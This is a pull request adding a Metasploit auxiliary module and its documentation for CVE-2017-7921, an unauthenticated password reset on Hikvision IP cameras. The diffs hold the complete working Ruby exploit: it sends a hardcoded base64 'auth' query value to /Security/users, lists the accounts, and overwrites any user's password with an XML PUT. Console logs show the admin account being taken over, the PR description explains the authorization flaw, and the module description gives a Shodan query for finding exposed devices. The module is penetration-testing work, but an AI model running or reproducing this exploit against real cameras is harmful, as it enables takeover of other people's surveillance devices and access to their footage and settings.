### PR TITLE
hikvision password reset via inproper authorization logic - CVE-2017-7921

### DIFF
--- a/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
@@ -1,19 +1,20 @@
 ## Vulnerable Application
 
-Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account.
-Our dear programmers from Hikvision left a piece of a code in the vulnerable firmware that has a hard coded magic string that bypasses
-all security on the camera and will provide full admin access.
-This allows a hacker to completely control the camera and modify any setting or retrieve sensible information.
+Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any
+configured user account. This is possible due to the firmware containing a hard coded magic string
+that bypasses all security on the camera and will provide full admin access. This allows a hacker to
+completely control the camera and modify any setting or retrieve sensitive information.
 
-This module allows the attacker to perform an unauthenticated password change of any vulnerable Hikvision IP Camera to gaining full
-administrative access. The vulnerability can be exploited for all configured users.
+This module allows the attacker to perform an unauthenticated password change on
+any vulnerable Hikvision IP Camera, which can be used to gain full administrative access
+to the affected device.
 
 The vulnerability has been present in Hikvision products since 2014.
-In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
+In addition to Hikvision-branded devices, it affects many white-labeled
+camera products sold under a variety of brand names.
 
 Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
 
-Versions:
 * DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
 * DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
 * DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
@@ -31,55 +32,21 @@ Installing a vulnerable test bed requires a Hikvision camera with the vulnerable
 1. `set RPORT <port>`
 1. `set USERNAME <name of user>`
 1. `set PASSWORD <new password>`
-1. `set ID <id of user>`
+1. `check`
+1. `set ID <id of user whose password you want to reset from "check" output>`
 1. `run`
 1. You should get a message that the password for the user successfully has been changed.
 
 ## Options
-
-There is an option `STORE_CRED` that allows you to store the user and password credentials
-at the Metasploit database for further use.
+### STORE_CRED
+This option allows you to store the user and password credentials in the Metasploit database for further use.
 
 ## Scenarios
-
-### Hikvision unauthenticated password reset vulnerability check
-
-```
-msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
-RHOSTS => 192.168.100.180
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
-
-Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
-
-   Name        Current Setting  Required  Description
-   ----        ---------------  --------  -----------
-   ID          1                yes       ID (default 1 for admin)
-   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
-   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
-                                          t
-   RPORT       80               yes       The target port (TCP)
-   SSL         false            no        Negotiate SSL/TLS for outgoing connections
-   STORE_CRED  true             no        Store credential into the database.
-   USERNAME    admin            yes       Username for password change
-   VHOST                        no        HTTP server virtual host
-
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
-
-[*] Following users are available for password reset...
-[*] USERNAME:admin | ID:1 | ROLE:Administrator
-[*] USERNAME:admln | ID:2 | ROLE:Operator
-[+] 192.168.100.180:80 - The target is vulnerable.
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
-```
 
 ### Hikvision unauthenticated password reset of the admin user with id=1
 
 ```
 msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
-msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
 msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
 RHOSTS => 192.168.100.180
 msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
@@ -107,16 +74,22 @@ Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
    USERNAME    admin            yes       Username for password change
    VHOST                        no        HTTP server virtual host
 
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[+] 192.168.100.180:80 - The target is vulnerable.
 msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
 [*] Running module against 192.168.100.180
 
 [*] Following users are available for password reset...
 [*] USERNAME:admin | ID:1 | ROLE:Administrator
 [*] USERNAME:admln | ID:2 | ROLE:Operator
-[*] Starting the password reset for user:admin and sending the payload...
-[+] Password reset for user:admin is successful completed !!!
-[*] Please log in with your new password:Pa$$W0rd
-[*] Credentials for user:admin are added to the database...
+[*] Starting the password reset for admin...
+[+] Password reset for admin was successfully completed!
+[*] Please log in with your new password: Pa$$W0rd
+[*] Credentials for admin were added to the database...
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
 Credentials
@@ -128,6 +101,3 @@ host             origin           service        public  private   realm  privat
 
 msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
 ```
-
-## Limitations
-No limitations.

--- a/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
@@ -1,0 +1,133 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account.
+Our dear programmers from Hikvision left a piece of a code in the vulnerable firmware that has a hard coded magic string that bypasses
+all security on the camera and will provide full admin access.
+This allows a hacker to completely control the camera and modify any setting or retrieve sensible information.
+
+This module allows the attacker to perform an unauthenticated password change of any vulnerable Hikvision IP Camera to gaining full
+administrative access. The vulnerability can be exploited for all configured users.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+Versions:
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set USERNAME <name of user>`
+1. `set PASSWORD <new password>`
+1. `set ID <id of user>`
+1. `run`
+1. You should get a message that the password for the user successfully has been changed.
+
+## Options
+
+There is an option `STORE_CRED` that allows you to store the user and password credentials
+at the Metasploit database for further use.
+
+## Scenarios
+
+### Hikvision unauthenticated password reset vulnerability check
+
+```
+msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
+RHOSTS => 192.168.100.180
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
+
+Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   ID          1                yes       ID (default 1 for admin)
+   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
+                                          t
+   RPORT       80               yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED  true             no        Store credential into the database.
+   USERNAME    admin            yes       Username for password change
+   VHOST                        no        HTTP server virtual host
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
+```
+
+### Hikvision unauthenticated password reset of the admin user with id=1
+
+```
+msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
+RHOSTS => 192.168.100.180
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
+PASSWORD => Pa$$W0rd
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
+ID => 1
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
+STORE_CRED => true
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
+
+Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   ID          1                yes       ID (default 1 for admin)
+   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
+                                          t
+   RPORT       80               yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED  true             no        Store credential into the database.
+   USERNAME    admin            yes       Username for password change
+   VHOST                        no        HTTP server virtual host
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[*] Starting the password reset for user:admin and sending the payload...
+[+] Password reset for user:admin is successful completed !!!
+[*] Please log in with your new password:Pa$$W0rd
+[*] Credentials for user:admin are added to the database...
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
+```
+
+## Limitations
+No limitations.

--- a/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
@@ -1,13 +1,17 @@
 ## Vulnerable Application
 
-Many Hikvision IP cameras contain backdoor credentials that allow unauthenticated impersonation of any
+Many Hikvision IP cameras contain improper authentication logic that allow unauthenticated impersonation of any
 configured user account. This allows an attacker to bypass all security on the camera and
 gain full admin access, allowing them to thereby completely control the camera and modify
 any setting or retrieve sensitive information.
 
 This module allows the attacker to perform an unauthenticated password change on
-any vulnerable Hikvision IP Camera using these backdoor credentials. This can then be
-used to gain full administrative access to the affected device.
+any vulnerable Hikvision IP Camera by utilizing the improper authentication logic to
+send a request  to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `username` parameter and will instead use the username
+part of this string as the user to log in as. This can then be used to gain full 
+administrative access to the affected device.
 
 The vulnerability has been present in Hikvision products since 2014.
 In addition to Hikvision-branded devices, it affects many white-labeled

--- a/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
@@ -1,13 +1,13 @@
 ## Vulnerable Application
 
-Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any
-configured user account. This is possible due to the firmware containing a hard coded magic string
-that bypasses all security on the camera and will provide full admin access. This allows a hacker to
-completely control the camera and modify any setting or retrieve sensitive information.
+Many Hikvision IP cameras contain backdoor credentials that allow unauthenticated impersonation of any
+configured user account. This allows an attacker to bypass all security on the camera and
+gain full admin access, allowing them to thereby completely control the camera and modify
+any setting or retrieve sensitive information.
 
 This module allows the attacker to perform an unauthenticated password change on
-any vulnerable Hikvision IP Camera, which can be used to gain full administrative access
-to the affected device.
+any vulnerable Hikvision IP Camera using these backdoor credentials. This can then be
+used to gain full administrative access to the affected device.
 
 The vulnerability has been present in Hikvision products since 2014.
 In addition to Hikvision-branded devices, it affects many white-labeled
@@ -35,7 +35,7 @@ Installing a vulnerable test bed requires a Hikvision camera with the vulnerable
 1. `check`
 1. `set ID <id of user whose password you want to reset from "check" output>`
 1. `run`
-1. You should get a message that the password for the user successfully has been changed.
+1. You should get a message that the password for the user has been successfully changed.
 
 ## Options
 ### STORE_CRED

--- a/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.md
@@ -25,6 +25,15 @@ Below is a list of vulnerable firmware, but many other white-labelled versions m
 
 Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
 
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
 ## Verification Steps
 
 1. `use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921`
@@ -43,7 +52,7 @@ This option allows you to store the user and password credentials in the Metaspl
 
 ## Scenarios
 
-### Hikvision unauthenticated password reset of the admin user with id=1
+### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
 
 ```
 msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921

--- a/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
+++ b/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
@@ -34,13 +34,6 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921' ],
           [ 'URL', 'http://seclists.org/fulldisclosure/2017/Sep/23' ]
         ],
-        'Platform' => 'linux',
-        'Arch' => ARCH_ARMLE,
-        'Privileged' => true,
-        'Targets' => [
-          [ 'Automatic', {} ]
-        ],
-        'DefaultTarget' => 0,
         'DisclosureDate' => '2017-09-23',
         'Notes' => {
           'Stability' => [CRASH_SAFE],

--- a/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
+++ b/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
@@ -1,0 +1,153 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Unauthenticated password change for any user configured at a vulnerable Hikvision IP Camera',
+        'Description' => %q{
+          Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account.
+          The vulnerability has been present in Hikvision products since 2014.
+          In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
+          Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing (shodan search: "App-webs" "200 OK").
+
+          This Module allows the attacker to perform an unauthenticated password change of any vulnerable Hikvision IP Camera to gaining full administrative access.
+          The vulnerability can be exploited for all configured users.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Monte Crypto', # Researcher who discovered and disclosed this vulnerability
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Developer and author of this Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2017-7921' ],
+          [ 'PACKETSTORM', '144097' ],
+          [ 'URL', 'https://ipvm.com/reports/hik-exploit' ],
+          [ 'URL', 'https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2017/Sep/23' ]
+        ],
+        'Platform' => 'linux',
+        'Arch' => ARCH_ARMLE,
+        'Privileged' => true,
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2017-09-23',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'Username for password change', 'admin']),
+        OptString.new('PASSWORD', [ true, 'New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters', 'Pa$$W0rd']),
+        OptString.new('ID', [ true, 'ID (default 1 for admin)', '1']),
+        OptBool.new('STORE_CRED', [false, 'Store credential into the database.', true])
+      ]
+    )
+  end
+
+  def report_creds
+    if datastore['SSL'] == true
+      service_proto = 'https'
+    else
+      service_proto = 'http'
+    end
+    service_data = {
+      address: datastore['RHOSTS'],
+      port: datastore['RPORT'],
+      service_name: service_proto,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: datastore['USERNAME'],
+      private_data: datastore['PASSWORD'],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    cred_res = create_credential_login(login_data)
+    unless cred_res.nil?
+      print_status("Credentials for user:#{datastore['USERNAME']} are added to the database...")
+    end
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'Security', 'users'),
+        'vars_get' => {
+          'auth' => 'YWRtaW46MTEK'
+        }
+      })
+    rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e
+      elog("A communication error occurs: #{e.message}", error: e)
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.nil?
+      return Exploit::CheckCode::Unknown
+    elsif res && res.code == 200
+      xml_res = res.get_xml_document
+      print_status('Following users are available for password reset...')
+      xml_res.css('User').each do |user|
+        print_status("USERNAME:#{user.at_css('userName').content} | ID:#{user.at_css('id').content} | ROLE:#{user.at_css('userLevel').content}")
+      end
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    return unless check == Exploit::CheckCode::Vulnerable
+
+    print_status("Starting the password reset for user:#{datastore['USERNAME']} and sending the payload...")
+    post_data = %(<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">\r\n<id>#{datastore['ID']}</id>\r\n<userName>#{datastore['USERNAME']}</userName>\r\n<password>#{datastore['PASSWORD']}</password>\r\n</User>)
+
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'Security', 'users'),
+      'vars_get' => {
+        'auth' => 'YWRtaW46MTEK'
+      },
+      'ctype' => 'application/xml',
+      'data' => post_data
+    })
+
+    if res.nil? || res.code != 200
+      print_error('Unknown Error. Password reset was not sucessfull!')
+      print_status("Please check the password rules and ensure that the user account/ID:#{datastore['USERNAME']}/#{datastore['ID']} exists!")
+      return
+    elsif res && res.code == 200
+      print_good("Password reset for user:#{datastore['USERNAME']} is successful completed !!!")
+      print_status("Please log in with your new password:#{datastore['PASSWORD']}")
+      if datastore['STORE_CRED'] == true
+        report_creds
+      end
+    end
+  end
+end

--- a/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
+++ b/modules/auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name' => 'Hikvision IP Camera Unauthenticated Password Change',
+        'Name' => 'Hikvision IP Camera Unauthenticated Password Change Via Backdoor Creds',
         'Description' => %q{
           Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account.
           The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(80),
         OptString.new('USERNAME', [ true, 'Username for password change', 'admin']),
         OptString.new('PASSWORD', [ true, 'New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters', 'Pa$$W0rd']),
-        OptString.new('ID', [ true, 'ID (default 1 for admin)', '1']),
+        OptInt.new('ID', [ true, 'ID (default 1 for admin)', 1]),
         OptBool.new('STORE_CRED', [false, 'Store credential into the database.', true])
       ]
     )
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
 
     begin
       print_status("Starting the password reset for #{datastore['USERNAME']}...")
-      post_data = %(<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">\r\n<id>#{datastore['ID']}</id>\r\n<userName>#{datastore['USERNAME']}</userName>\r\n<password>#{datastore['PASSWORD']}</password>\r\n</User>)
+      post_data = %(<User version="1.0" xmlns="http://www.hikvision.com/ver10/XMLSchema">\r\n<id>#{datastore['ID'].to_s.encode(xml: :text)}</id>\r\n<userName>#{datastore['USERNAME']&.encode(xml: :text)}</userName>\r\n<password>#{datastore['PASSWORD']&.encode(xml: :text)}</password>\r\n</User>)
 
       res = send_request_cgi({
         'method' => 'PUT',


### PR DESCRIPTION
Many Hikvision IP cameras ~contain a backdoor~ have improper authorization logic that allows unauthenticated impersonation of any configured user account.
Our dear programmers from Hikvision developed proprietary HikCGI protocol, which exposes URI endpoints through the camera's web interface. The HikCGI protocol handler checks for the presence of a parameter named "auth" in the query string and if that parameter contains a base64-encoded `username:password` string, the HikCGI API call assumes the identity of the specified user. The password is ignored.~left a piece of a code in the vulnerable firmware that has a hard coded magic string~  Using user `admin` ~allows  that~ bypasses all security on the camera and will provide full admin access. This allows a hacker to completely control the camera and modify any setting or retrieve sensitive information.

This module allows the attacker to perform an unauthenticated password change of any vulnerable Hikvision IP Camera to gain full administrative access. The vulnerability can be exploited for all configured users.

The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.

Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.

Versions:
* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106

Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.

This module has been tested against a Hikvision camera with the specifications listed below:

* MANUFACTURER: Hikvision.China
* MODEL: DS-2CD2142FWD-IS
* FIRMWARE VERSION: V5.4.1
* FIRMWARE RELEASE: build 160525
* BOOT VERSION: V1.3.4
* BOOT RELEASE: 100316

## Verification
- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ] `set RPORT <port>`
- [ ] `set USERNAME <name of user>`
- [ ] `set PASSWORD <new password>`
- [ ]  `set ID <id of user>`
- [ ]  `run`

You should get a message that the password for the user successfully has been changed.

## Options
There is an option `STORE_CRED` that allows you to store the user and password credentials at the Metasploit database for further use.

## Hikvision unauthenticated password reset of the admin user with id=1
```
msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
RHOSTS => 192.168.100.180
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
PASSWORD => Pa$$W0rd
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
ID => 1
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
STORE_CRED => true
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options

Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   ID          1                yes       ID (default 1 for admin)
   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
                                          t
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   STORE_CRED  true             no        Store credential into the database.
   USERNAME    admin            yes       Username for password change
   VHOST                        no        HTTP server virtual host

msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
[*] Running module against 192.168.100.180

[*] Following users are available for password reset...
[*] USERNAME:admin | ID:1 | ROLE:Administrator
[*] USERNAME:admln | ID:2 | ROLE:Operator
[*] Starting the password reset for user:admin and sending the payload...
[+] Password reset for user:admin is successful completed !!!
[*] Please log in with your new password:Pa$$W0rd
[*] Credentials for user:admin are added to the database...
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
Credentials
===========

host             origin           service        public  private   realm  private_type  JtR Format
----             ------           -------        ------  -------   -----  ------------  ----------
192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password

msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) >
```
